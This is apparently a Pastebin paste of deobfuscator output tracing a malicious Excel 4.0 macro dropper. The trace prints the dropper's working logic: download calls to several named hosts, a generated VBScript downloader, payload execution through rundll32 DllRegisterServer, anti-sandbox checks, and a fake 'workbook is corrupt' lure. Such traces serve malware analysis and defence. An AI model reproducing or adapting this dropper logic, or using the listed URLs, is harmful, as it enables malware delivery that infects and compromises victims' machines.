  276. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  277. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  278. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  279. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  280. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  281. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  282. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  283. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  284. CELL:HO38089 , FullEvaluation , [FALSE]
  285. CELL:HO38090 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  286. CELL:HO38091 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  287. CELL:HO38092 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  288. CELL:HO38093 , FullEvaluation , IF(R38091C223<40000,,GOTO(R38104C223))
  289. CELL:HO38094 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  290. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  291. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  292. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  293. CELL:HO38097 , FullEvaluation , [FALSE]
  294. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  295. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  296. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  297. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  298. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  299. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  300. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  301. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  302. CELL:IE49834 , FullEvaluation , [FALSE] GOTO(R142C133)
  303. CELL:EC142 , FullEvaluation , "=""C:\Users\Public\UWvo.html"""
  304. CELL:EC143 , FullEvaluation , "=""C:\Users\Public\VEu7ojib.vbs"""
  305. CELL:EC144 , FullEvaluation , "=FOPEN(R35703C82,3)"
  306. CELL:EC145 , FullEvaluation , "=FWRITELN(R35704C82,""h8xNMAA = """"https://wireborg.com/wp-keys.php"""""")"
  307. CELL:EC146 , FullEvaluation , "=FWRITELN(R35704C82,""MG8 = """"http://zmedia.shwetech.com/wp-keys.php"""""")"
  308. CELL:EC147 , FullEvaluation , "=FWRITELN(R35704C82,""LPDuR4W = """"https://datalibacbi.ml/wp-keys.php"""""")"
  309. CELL:EC148 , FullEvaluation , "=FWRITELN(R35704C82,""MhTSF = """"https://procacardenla.ga/wp-keys.php"""""")"
  310. CELL:EC149 , FullEvaluation , "=FWRITELN(R35704C82,""PXqk = Array(h8xNMAA,MG8,LPDuR4W,MhTSF)"")"
  311. CELL:EC150 , FullEvaluation , "=FWRITELN(R35704C82,""Dim BicuZ: Set BicuZ = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  312. CELL:EC151 , FullEvaluation , "=FWRITELN(R35704C82,""Function WuZErsim(data):"")"
  313. CELL:EC152 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.setOption(2) = 13056"")"
  314. CELL:EC153 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.Open """"GET"""", data, False"")"
  315. CELL:EC154 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  316. CELL:EC155 , FullEvaluation , "=FWRITELN(R35704C82,""BicuZ.Send"")"
  317. CELL:EC156 , FullEvaluation , "=FWRITELN(R35704C82,""WuZErsim = BicuZ.Status"")"
  318. CELL:EC157 , FullEvaluation , "=FWRITELN(R35704C82,""End Function"")"
  319. CELL:EC158 , FullEvaluation , "=FWRITELN(R35704C82,""For Each LS5TrmD in PXqk"")"
  320. CELL:EC159 , FullEvaluation , "=FWRITELN(R35704C82,""If WuZErsim(LS5TrmD) = 200 Then"")"
  321. CELL:EC160 , FullEvaluation , "=FWRITELN(R35704C82,""Dim eGo: Set eGo = CreateObject(""""ADODB.Stream"""")"")"
  322. CELL:EC161 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Open"")"
  323. CELL:EC162 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Type = 1"")"
  324. CELL:EC163 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Write BicuZ.ResponseBody"")"
  325. CELL:EC164 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.SaveToFile """"""&R35702C82&"""""", 2"")"
  326. CELL:EC165 , FullEvaluation , "=FWRITELN(R35704C82,""eGo.Close"")"
  327. CELL:EC166 , FullEvaluation , "=FWRITELN(R35704C82,""Exit For"")"
  328. CELL:EC167 , FullEvaluation , "=FWRITELN(R35704C82,""End If"")"
  329. CELL:EC168 , FullEvaluation , "=FWRITELN(R35704C82,""Next"")"
  330. CELL:EC169 , FullEvaluation , "=FCLOSE(R35704C82)"
  331. CELL:EC170 , FullEvaluation , "=EXEC(""explorer.exe ""&R35703C82&"""")"
  332. CELL:EC171 , FullEvaluation , "=WHILE(ISERROR(FILES(R35702C82)))"
  333. CELL:EC172 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  334. CELL:EC173 , FullEvaluation , "=NEXT()"
  335. CELL:EC174 , FullEvaluation , "=FILE.DELETE(R35703C82)"
  336. CELL:EC175 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  337. CELL:EC176 , FullEvaluation , "=""C:\Users\Public\xD9fZh.vbs"""
  338. CELL:EC177 , FullEvaluation , "=FOPEN(R35736C82,3)"
  339. CELL:EC178 , FullEvaluation , "=""rundll32.exe"""
  340. CELL:EC179 , FullEvaluation , "=R35702C82&"",DllRegisterServer"""
  341. CELL:EC180 , FullEvaluation , "=""C:\Windows\System32"""
  342. CELL:EC181 , FullEvaluation , "=FWRITELN(R35737C82,""Set H6snW = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  343. CELL:EC182 , FullEvaluation , "=FWRITELN(R35737C82,""H6snW.Document.Application.ShellExecute """"""&R35738C82&"""""",""""""&R35739C82&"""""",""""""&R35740C82&"""""",Null,0"")"
  344. CELL:EC183 , FullEvaluation , "=FCLOSE(R35737C82)"
  345. CELL:EC184 , FullEvaluation , "=EXEC(""explorer.exe ""&R35736C82&"""")"
  346. CELL:EC185 , FullEvaluation , "=GOTO(R49803C239)"
  347. CELL:EC186 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  348. CELL:HE8688 , FullEvaluation , FORMULA("=FORMULA(R[-8547]C[-80],R[27013]C[-131])",jdOsRgCP7ufKCKrN6H$CD$35702)
  349. CELL:HE8733 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  350. CELL:HE8733 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  351. CELL:II24421 , FullEvaluation , "=CLOSE(FALSE)"
  352. CELL:II24422 , FullEvaluation , "=APP.MAXIMIZE()"
  353. CELL:II24423 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R49803C239),)"
  354. CELL:II24424 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R49803C239))"
  355. CELL:II24425 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)"
  356. CELL:II24426 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R49803C239),)"
  357. CELL:II24427 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)"
  358. CELL:II24428 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)"
  359. CELL:II24429 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R49803C239))"
  360. CELL:IE49813 , FullEvaluation , [FALSE] GOTO(R49803C239)
  361. CELL:IE49803 , End , CLOSE(FALSE)
  362. [END of Deobfuscation]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!